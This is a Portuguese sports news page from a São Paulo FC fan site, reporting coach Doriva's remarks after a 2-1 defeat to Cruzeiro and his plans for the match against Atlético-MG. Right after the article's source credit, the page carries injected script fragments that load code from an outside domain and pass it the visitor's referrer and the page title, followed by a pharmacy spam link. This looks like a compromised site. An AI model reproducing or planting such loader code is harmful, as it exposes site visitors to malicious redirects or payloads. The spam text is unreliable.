Destaque Noticia

Doriva ignora título do Corinthians e já projeta vitória sobre o Atlético-MG

Doriva não parece preocupado em evitar o título de campeão brasileiro do Corinthians. O técnico do São Paulo declarou após a derrota por 2 a 1 para o Cruzeiro, nesse domingo, no Mineirão, que a equipe dará o máximo dentro de campo para se manter na briga pelo G4 com uma vitória sobre o vice-líder Atlético-MG na próxima rodada. “Temos que fazer uma grande partida para derrotar o Atlético-MG no próximo jogo e continuar a busca pelo nosso propósito”, disse o comandante.

O treinador já havia dito durante a última semana que gostaria de enfrentar o Timão, no dia 22, com o título confirmado para o rival. Caso conquiste os três pontos contra o Galo, no próximo dia 19, o Tricolor eliminará qualquer chance matemática que o Corinthians tem de perder o troféu do Nacional.

Segundo Doriva, o momento decisivo do Brasileirão impede o São Paulo de desperdiçar mais pontos. “Estamos conversando e orientando. Sabemos que estamos bem vivos na competição. O fato de termos chances de conquistar o nosso objetivo já motiva os atletas. Temos um compromisso muito grande, mas hoje perdemos o jogo. A reação será imediata”, declarou.

A reapresentação do São Paulo está marcada para a quarta-feira. Ao que tudo indica, Doriva deverá comandar atividades táticas que priorizem a criação de jogadas ofensivas. O treinador não aprovou a disposição do time no primeiro tempo e deseja corrigir as falhas já na partida contra o Atlético-MG.

“Hoje fizemos um gol com o Luis Fabiano, mas criamos pouco. O Cruzeiro conseguiu impor um ritmo muito forte e eu fui obrigado a fazer um ajuste para conseguir encaixar a marcação. Nós equilibramos o jogo e até criamos algumas chances que poderiam ter sido convertidas em gol”, afirmou. “Não era o resultado que queríamos. Temos uma sequência difícil, mas estamos dentro e precisamos vencer para voltar a figurar no G4”, concluiu.

Gazeta Esportiva.nets.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; cheap pills purchase a cheap pills no rx – http://crna.radiostudent.si/?p=2967

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

16 − oito =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque Noticia

Mais em Destaque Noticia

Fora da seleção brasileira, Daniel Alves repensa situação no clube e quer voltar a ser lateral

saopauloadmin24 de outubro de 2020

São Paulo perderá apenas uma posição no Brasileiro com jogo adiado

saopauloadmin23 de outubro de 2020

São Paulo pega argentinos na Sul-Americana

saopauloadmin23 de outubro de 2020

Quando foi a última vez que o São Paulo fez 5 gols em um jogo?

saopauloadmin21 de outubro de 2020

Sul-Americana, Copa do Brasil ou Brasileirão: qual torneio se dedicar?

saopauloadmin20 de outubro de 2020

São Paulo vive a sua maior sequência sem derrotas na temporada mas só venceu 2 dos últimos 11 jogos

saopauloadmin19 de outubro de 2020

São Paulo: Diniz afirma que arbitragem contra Fortaleza foi ‘confusa’

saopauloadmin15 de outubro de 2020

Veja o que mudou no SPFC desde o adeus na Libertadores

saopauloadmin13 de outubro de 2020

Fernando Diniz supera pressão e segue com duas pedras no caminho: Palmeiras e Rogério Ceni

saopauloadmin8 de outubro de 2020